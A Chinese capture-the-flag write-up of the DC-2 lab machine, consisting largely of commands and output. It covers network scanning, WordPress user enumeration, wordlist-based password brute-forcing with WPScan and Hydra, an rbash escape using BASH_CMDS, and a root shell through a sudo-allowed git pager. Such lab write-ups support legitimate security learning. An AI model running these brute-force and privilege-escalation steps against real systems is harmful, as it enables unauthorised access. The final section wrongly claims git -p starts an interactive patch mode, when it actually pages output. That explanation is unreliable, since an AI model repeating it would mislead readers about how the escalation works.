信息收集

注:少见的一台可以使用 VMware Workstation 直接打开的靶机。

  • 首先查看 Kali IP 地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in ~ 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:22:78:42 brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.15/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1593sec preferred_lft 1593sec
    inet6 fe80::c6b4:c54f:b3d3:4226/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

  • 使用 Nmap 扫描出一个 IP:10.10.8.143
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in ~ 
$ nmap -sn -T4 --min-rate 10000 10.10.8.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 11:29 CST
Nmap scan report for 10.10.8.1
Host is up (0.00015s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.143
Host is up (0.000065s latency).
MAC Address: 00:0C:29:5D:7F:7A (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000048s latency).
MAC Address: 00:50:56:F9:F5:8B (VMware)
Nmap scan report for 10.10.8.15
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.68 seconds

端口扫描

  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
root at kali in ~ 
$ nmap -p- -sT -T4 --min-rate 10000 10.10.8.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 11:30 CST
Nmap scan report for 10.10.8.143
Host is up (0.00075s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 00:0C:29:5D:7F:7A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.36 seconds

服务识别

  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root at kali in ~ 
$ nmap -p80,7744 -sV -O -sT -T4 --min-rate 10000 10.10.8.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 11:31 CST
Nmap scan report for 10.10.8.143
Host is up (0.00038s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
MAC Address: 00:0C:29:5D:7F:7A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.17 seconds

漏洞扫描

  • 使用 Nmap 进行漏洞扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root at kali in ~ 
$ nmap -p80,7744 -A --script=vuln -T4 --min-rate 10000 10.10.8.143      
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-12 11:33 CST
Nmap scan report for 10.10.8.143
Host is up (0.00048s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.10 (Debian)
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:6.7p1: 
|       CVE-2015-5600   8.5     https://vulners.com/cve/CVE-2015-5600
|       PRION:CVE-2020-16088    7.5     https://vulners.com/prion/PRION:CVE-2020-16088
|       CVE-2015-6564   6.9     https://vulners.com/cve/CVE-2015-6564
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       SSV:90447       4.6     https://vulners.com/seebug/SSV:90447    *EXPLOIT*
|       CVE-2016-0778   4.6     https://vulners.com/cve/CVE-2016-0778
|       PRION:CVE-2021-41617    4.4     https://vulners.com/prion/PRION:CVE-2021-41617
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2015-5352   4.3     https://vulners.com/cve/CVE-2015-5352
|       CVE-2016-0777   4.0     https://vulners.com/cve/CVE-2016-0777
|_      CVE-2015-6563   1.9     https://vulners.com/cve/CVE-2015-6563
MAC Address: 00:0C:29:5D:7F:7A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.48 ms 10.10.8.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.98 seconds
  • 看了下扫出来的漏洞,没一个有用的。

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
root at kali in ~ 
$ dirsearch -u http://10.10.8.143 -o ~/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                  
 (_||| _) (/_(_|| (_| )                                                                                                                           
                                                                                                                                                  
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-11-13_00-40-14.log

Target: http://10.10.8.143/

[00:40:14] Starting: 
[00:40:15] 403 -  300B  - /.htaccess.bak1                                  
[00:40:15] 403 -  297B  - /.ht_wsr.txt
[00:40:15] 403 -  300B  - /.htaccess_orig
[00:40:15] 403 -  298B  - /.htaccess_sc
......

root at kali in ~ 
$ cat dirsearch.txt| grep 200                       
200    52KB  http://10.10.8.143:80/index.php
200    19KB  http://10.10.8.143:80/license.txt
200     7KB  http://10.10.8.143:80/readme.html
200     0B   http://10.10.8.143:80/wp-content/
200    69B   http://10.10.8.143:80/wp-content/plugins/akismet/akismet.php
200     0B   http://10.10.8.143:80/wp-config.php
200    40KB  http://10.10.8.143:80/wp-includes/
200     1B   http://10.10.8.143:80/wp-admin/admin-ajax.php
200     0B   http://10.10.8.143:80/wp-cron.php
200     2KB  http://10.10.8.143:80/wp-login.php
200     1KB  http://10.10.8.143:80/wp-admin/install.php

root at kali in ~ 
$ cat dirsearch.txt| grep 301 
403   301B   http://10.10.8.143:80/.htaccess_extra
301   313B   http://10.10.8.143:80/wp-admin    -> REDIRECTS TO: http://10.10.8.143/wp-admin/
301   315B   http://10.10.8.143:80/wp-content    -> REDIRECTS TO: http://10.10.8.143/wp-content/
301   316B   http://10.10.8.143:80/wp-includes    -> REDIRECTS TO: http://10.10.8.143/wp-includes/
  • 发现是一个 WordPress CMS。

漏洞利用

域名绑定

  • 当直接访问站点时,会出现无法访问,并提示打开 www.dc-2.com:

image-20231112120552480

  • 使用 BurpSuite 抓个包,发现 Host 地址写的是 dc-2:

image-20231112120724371

  • 这时候,应该反应过来,是要修改本地 DNS 文件:
1
2
3
4
5
6
7
8
root at kali in ~ 
$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.10.8.143     dc-2
  • 再次访问一下:

image-20231112120944018

flag1

  • 在页面显示部分,发现了 Flag Page:

image-20231112121016651

  • 提示我要使用 Cewl 进行单词表收集:
1
2
3
4
5
6
7
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

收集单词表

  • 使用如下命令收集站点单词表,保存到 password.txt:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root at kali in ~ 
$ cewl http://dc-2 -w password.txt                                           
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

root at kali in ~ 
$ cat password.txt                                     
sit
amet
nec
quis
vel
orci
site
non
sed

WPScan

  • 由于对方站点使用的是 WordPress,那就使用 WPScan 进行用户枚举、插件漏洞、主题漏洞的扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
root at kali in ~ 
$ wpscan --url http://dc-2 --no-banner -e u,vp,vt

 [32m[+] [0m URL: http://dc-2/ [10.10.8.143]
 [32m[+] [0m Started: Sun Nov 12 23:02:49 2023

Interesting Finding(s):
......
 [34m[i] [0m No plugins Found.

 [34m[i] [0m No themes Found.

 [34m[i] [0m User(s) Identified:

 [32m[+] [0m admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

 [32m[+] [0m jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

 [32m[+] [0m tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

 [33m[!] [0m No WPScan API Token given, as a result vulnerability data has not been output.
 [33m[!] [0m You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
......
  • 扫描出三个用户:admin、jerry、tom

注:正常扫,应该是要加 api-token 的,这里就不加了。

暴力破解

  • 将收集到的用户名写入 username.txt 文件:
1
2
3
4
5
6
7
8
root at kali in ~ 
$ vim username.txt                                                                                                     

root at kali in ~ 
$ cat username.txt 
admin
jerry
tom
  • 使用 WPScan 进行用户名密码的爆破:
1
2
3
4
5
6
7
8
9
10
11
12
root at kali in ~ 
$ wpscan --url http://dc-2 --no-banner -U username.txt -P password.txt
.......
[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                                                                                    
[SUCCESS] - tom / parturient                                                                                                                      
Trying admin / log Time: 00:00:18 <==========================================                                 > (646 / 1121) 57.62%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient
......
  • 爆破出来两个账号密码,尝试登录一下,根据之前的扫描结果,后台的登录地址是: http://10.10.8.143/wp-admin/

image-20231113005019543

image-20231113005254995

image-20231113005327955

flag2

  • 两个账户都可以登录后台,但是在 jerry 后台发现了 flag2:

image-20231113005631293

  • 意思是,如果 wordpress 找不到漏洞,就可以换一种:
1
2
3
4
5
Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

SSH 登录

  • 既然叫咱换,咋就换。
  • 得到账号密码后,还有个东西没用,SSH 登录。
  • 将 password.txt 内容改为:
1
2
adipiscing
parturient
  • 使用 hydra 进行爆破:
1
2
3
4
5
6
7
8
9
10
11
12
root at kali in ~ 
$ hydra -L username.txt -P password.txt ssh://dc-2:7744
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-11-12 23:26:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:2/p:2), ~1 try per task
[DATA] attacking ssh://dc-2:7744/
[7744][ssh] host: dc-2   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-11-12 23:26:53
  • 发现 tom 可以进行登录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root at kali in ~ 
$ ssh tom@10.10.8.143 -p 7744
The authenticity of host '[10.10.8.143]:7744 ([10.10.8.143]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.8.143]:7744' (ED25519) to the list of known hosts.
tom@10.10.8.143's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ id
-rbash: id: command not found

rbash 限制突破

  • SSH 登录后,发现当前 Shell 是一个 rbash:
1
2
tom@DC-2:~$ echo $0
-rbash
  • rbash:restricted bash 是一种受限制的Unix shell环境,它是 Bash Shell 的一种变体,旨在提供一种更安全的 shell 环境,限制用户对系统的访问和操作权限。
  • 当用户被分配了 rbash 作为其默认 shell 时,他们将无法执行许多常见的操作,例如更改当前工作目录、重定向输入/输出、使用某些命令或设置特定的环境变量。rbash 通常用于限制用户的操作范围,以防止他们对系统进行未经授权的更改或访问敏感信息。
  • 以下是一些 rbash 的特点和限制:
    • 无法更改当前工作目录:用户无法使用 cd 命令切换到其他目录。
    • 限制输入/输出重定向:用户无法使用重定向操作符(如>、>>、<)来更改命令的输入或输出。
    • 禁止设置或修改环境变量:用户无法设置或修改环境变量,这样可以限制对系统配置的更改。
    • 禁止使用特定命令:可以根据需要禁止用户执行特定的命令或指定的命令路径。
    • 限制用户自定义函数:用户无法定义或修改自定义函数。
  • 既然是 rbash 那就基本啥也干不了,难受。
  • 看看这个 rbash 的执行目录在哪:
1
2
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
  • 进去看看有啥能用的命令:
1
2
3
4
5
6
tom@DC-2:~$ ls -l usr/bin
total 0
lrwxrwxrwx 1 tom tom 13 Mar 21  2019 less -> /usr/bin/less
lrwxrwxrwx 1 tom tom  7 Mar 21  2019 ls -> /bin/ls
lrwxrwxrwx 1 tom tom 12 Mar 21  2019 scp -> /usr/bin/scp
lrwxrwxrwx 1 tom tom 11 Mar 21  2019 vi -> /usr/bin/vi
  • 蛋疼,啥也干不了。
  • 怎么办呢,找找 rbash 绕过的方式,还真给我找到了,使用 BASH_CMDS 创建一个自定义命令:
1
2
3
4
tom@DC-2:~$ BASH_CMDS[yz]=/bin/bash
tom@DC-2:~$ yz
tom@DC-2:~$ echo $0
yz
  • 可以看到 Shell 环境已经发生改变,但是命令的环境变量还是没变:
1
2
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
  • 不过既然都切换了 Shell,直接添加 PATH 变量(去 Kali 复制一个):
1
2
3
4
5
tom@DC-2:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH
tom@DC-2:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/home/tom/usr/bin
tom@DC-2:~$ id
uid=1001(tom) gid=1001(tom) groups=1001(tom)
  • nice!

flag3

  • 在当前目录下找到了 flag3.txt:
1
2
3
4
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.
  • 大概的意思就是需要使用 su 切换到 jerry 用户。

用户切换

  • 之前也有 jerry 用户的密码,但是 SSH 没登上,应该是做了过滤。
  • 那使用 su 直接切换试试:
1
2
3
4
tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$ id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry)

flag4

  • 切换成功!找一找 flag4:
1
2
3
4
5
6
7
8
9
10
jerry@DC-2:/home/tom$ find / -name flag4* 2>/dev/null
/home/jerry/flag4.txt
jerry@DC-2:/home/tom$ cat /home/jerry/flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!
  • 看似没有提示,其实还是有的 git。

git 提权

  • 查看一下 git 的位置:
1
2
3
4
jerry@DC-2:/home/tom$ type git
git is /usr/bin/git
jerry@DC-2:/home/tom$ ls -l /usr/bin/git
-rwxr-xr-x 1 root root 1927972 Oct  5  2018 /usr/bin/git
  • 查看 sudo 可执行的命令:
1
2
3
4
5
6
erry@DC-2:/home/tom$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
  • 哦豁,那就是 git 提权没错了:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
jerry@DC-2:/home/tom$ sudo git -p help config
GIT-CONFIG(1)                                                     Git Manual                                                     GIT-CONFIG(1)



NAME
       git-config - Get and set repository or global options

SYNOPSIS
       git config [<file-option>] [type] [-z|--null] name [value [value_regex]]
       git config [<file-option>] [type] --add name value
       git config [<file-option>] [type] --replace-all name value [value_regex]
       git config [<file-option>] [type] [-z|--null] --get name [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-all name [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-regexp name_regex [value_regex]
       git config [<file-option>] [type] [-z|--null] --get-urlmatch name URL
       git config [<file-option>] --unset name [value_regex]
       git config [<file-option>] --unset-all name [value_regex]
       git config [<file-option>] --rename-section old_name new_name
       git config [<file-option>] --remove-section name
       git config [<file-option>] [-z|--null] -l | --list
       git config [<file-option>] --get-color name [default]
       git config [<file-option>] --get-colorbool name [stdout-is-tty]
       git config [<file-option>] -e | --edit


DESCRIPTION
       You can query/set/replace/unset options with this command. The name is actually the section and the key separated by a dot, and the
       value will be escaped.

       Multiple lines can be added to an option by using the --add option. If you want to update or unset an option which can occur on
       multiple lines, a POSIX regexp value_regex needs to be given. Only the existing values that match the regexp are updated or unset. If
       you want to handle the lines that do not match the regex, just prepend a single exclamation mark in front (see also the section called
!/bin/bash
root@DC-2:/home/tom# id
uid=0(root) gid=0(root) groups=0(root)
  • nice!

flag5

  • 找一找 flag5:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@DC-2:/home/tom# cd /root
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat fin*
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

补充内容

git 提权原理

  • 刚刚使用了 git 进行提权:
1
2
sudo git -p help config
!/bin/sh

  • 正所谓知其然,还要知其所以然。

  • git -p 是 Git 的一个命令行选项,用于在交互模式下进行部分(或补丁)的提交。

    • 当你在 Git 中使用 git -p 命令时,Git 会进入交互模式,逐个显示你所做的更改,并询问你是否要将它们包含在提交中。你可以选择将更改分成多个补丁(patches),也可以选择跳过某些更改。

  • git -p help config 是一个命令,用于获取有关 Git 配置的帮助信息。

    • 在 Git 中,config 命令用于配置 Git 的行为和属性。通过在 git -p help config 命令中使用 -p 选项,你可以进入交互模式,逐个查看有关 Git 配置的帮助信息,并按需进行选择。
    • 在交互模式中,Git 会显示有关 Git 配置的帮助文本,并以一系列选项提示你进行选择。你可以阅读帮助文本,了解每个配置选项的作用和用法。你可以使用 y(yes)选择某个配置选项,并获取更详细的帮助信息。

  • 这样就清楚了,git -p 开启了交互模式,help config 开启配置选项,在选项处进行 Root Shell 转换。